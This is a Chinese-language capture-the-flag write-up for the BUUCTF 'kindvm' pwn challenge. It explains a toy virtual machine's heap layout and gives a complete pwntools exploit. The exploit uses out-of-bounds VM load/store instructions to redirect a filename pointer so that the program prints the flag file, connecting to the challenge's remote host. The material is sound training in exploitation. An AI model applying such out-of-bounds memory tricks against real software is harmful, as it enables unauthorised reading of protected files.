BUUCTF"/>
[BUUCTF
一直没独自处理过虚拟机的题,今天遇到一个简单的。
主要功能:
void *kindvm_setup()
{int v0; // ebxvoid *result; // eaxkc = (int)malloc(0x18u);*(_DWORD *)kc = 0;*(_DWORD *)(kc + 4) = 0;v0 = kc;*(_DWORD *)(v0 + 8) = input_username();*(_DWORD *)(kc + 12) = "banner.txt";*(_DWORD *)(kc + 16) = func_greeting;*(_DWORD *)(kc + 20) = func_farewell;mem = malloc(0x400u);memset(mem, 0, 0x400u);reg = malloc(0x20u);memset(reg, 0, 0x20u);insn = malloc(0x400u);result = memset(mem, 65, 0x400u);func_table[0] = (int)insn_nop;dword_804B0C4 = (int)insn_load;dword_804B0C8 = (int)insn_store;dword_804B0CC = (int)insn_mov;dword_804B0D0 = (int)insn_add;dword_804B0D4 = (int)insn_sub;dword_804B0D8 = (int)insn_halt;dword_804B0DC = (int)insn_in;dword_804B0E0 = (int)insn_out;dword_804B0E4 = (int)insn_hint;return result;
}
先在堆里建5个块,分别是
- 管理块,+4退出标记1退出0继续 +8:ptr->name +c:ptr->banner.txt +10:ptr->欢迎 +14:再见。其中欢迎和再见都会打开+c的文件读取并输出
- name 输入的名字
- mem 虚拟机的内存区
- ret 虚拟机的寄存器区8个寄存器
- 输入命令存储区
基本命令:
- 0 nop 肯定没用
- 1 1:reg_id 2:mem_offset 大端 load从mem+mem_offset里读4字节数存入 reg[reg_id]
- 2 2:mem_offset 1:reg_id 将reg[reg_id]的值存入 mem+mem_offset
- 6 halt 设置后退出程序
思路就简单了,由于开始结束时都会读一个文件,只要把这个文件(+c位置)改成name(+8 flag)即可。其它功能基本都用不着
完整exp
from pwn import *'''
patchelf --set-interpreter /home/shi/pwn/libc6-i386_2.27-3u1/ld-2.27.so pwn
patchelf --add-needed /home/shi/pwn/libc6-i386_2.27-3u1/libc-2.27.so pwn
'''local = 0
if local == 1: #localp = process('./pwn')
elif local == 0: #remotep = remote('node4.buuoj', 27929) libc_elf = ELF('/home/shi/pwn/libc6-i386_2.27-3u1/libc-2.27.so')
one = [0x3cbea,0x3cbec,0x3cbf0,0x3cbf7,0x6729f,0x672a0,0x13573e,0x13573f]
libc_start_main_ret = 0x1eee5 elf = ELF('./pwn')
context(arch = 'i386', log_level='debug')'''
0 nop
1 load 1:reg_id 2: 4:number mov reg[i], num
2 store 3:mem_id 1:reg_id mov mem[j], reg[i]
3 mov 1:reg_id i 1:reg_id j mov reg[i], reg[j]
4 add 1:reg_id i 1:reg_id j reg[i] += reg[j]
5 sub 1:reg_id i 1:reg_id j reg[i] -= reg[j]
6 halt
7 in 1:reg_id 4:number reg[i] = number
8 out 1:reg_id printf("%x(%d)", reg[i], reg[i])
9 hint hint2.txt20:fun 10:name 410:mem 30:reg 410 insn0x21: +8->name +c->banner.txt +10->greeting +14->farewall
0x804c190: 0x00000000 0x00000000 0x00000000 0x00000021
0x804c1a0: 0x00000000 0x00000000 0x0804c1c0 0x080491b2 <--- 改为0x0804c1c0
0x804c1b0: 0x08048f89 0x08048fba 0x00000000 0x00000011
0x804c1c0: 0x61616161 0x00000000 0x00000000 0x00000411
0x804c1d0: 0x41414141 0x41414141 0x41414141 0x41414141'''#gdb.attach(p, 'b*0x80487ac')
#pause()
p.sendlineafter(b"Input your name : ", b'flag\x00')
payload = b'\x01\x00\xff\xd8' #load mem[-0x28] -> reg[0]
payload+= b'\x02\xff\xdc\x00' #store reg[0] -> mem[-0x24]
payload+= b'\x06' #halt
p.sendlineafter(b'Input instruction : ', payload)p.recv()
p.interactive()
有个小坑,这里16位整形是大端的。
更多推荐
[BUUCTF
发布评论